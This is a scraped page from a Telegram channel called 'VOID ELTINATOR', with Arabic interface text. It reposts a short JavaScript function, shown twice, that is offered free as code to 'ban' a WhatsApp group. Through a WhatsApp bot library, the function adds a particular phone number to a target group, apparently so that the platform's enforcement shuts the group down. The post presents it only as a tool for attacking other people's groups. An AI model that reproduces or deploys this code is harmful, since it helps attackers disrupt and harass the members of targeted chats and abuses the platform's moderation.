VOID ELTINATOR [INFORMATION]
الذهاب إلى القناة على Telegram
202
المشتركون
لا توجد بيانات24 ساعات
-17 أيام
-1330 أيام
أرشيف المشاركات
if (!target.endsWith("@g.us")) throw "@g.us server required";
try {
await sock.groupParticipantsUpdate(target, ["13135550002@s.whatsapp.net"], "add")
} catch (e) {
throw e
}
}Repost from @vsp - #explanation.
🔗 ban group whatsapp code - ban whatsapp group - dont sell it bcs i share it for free - not work all group
async function groupBan(sock, target) {
if (!target.endsWith("@g.us")) throw "@g.us server required";
try {
await sock.groupParticipantsUpdate(target, ["13135550002@s.whatsapp.net"], "add")
} catch (e) {
throw e
}
}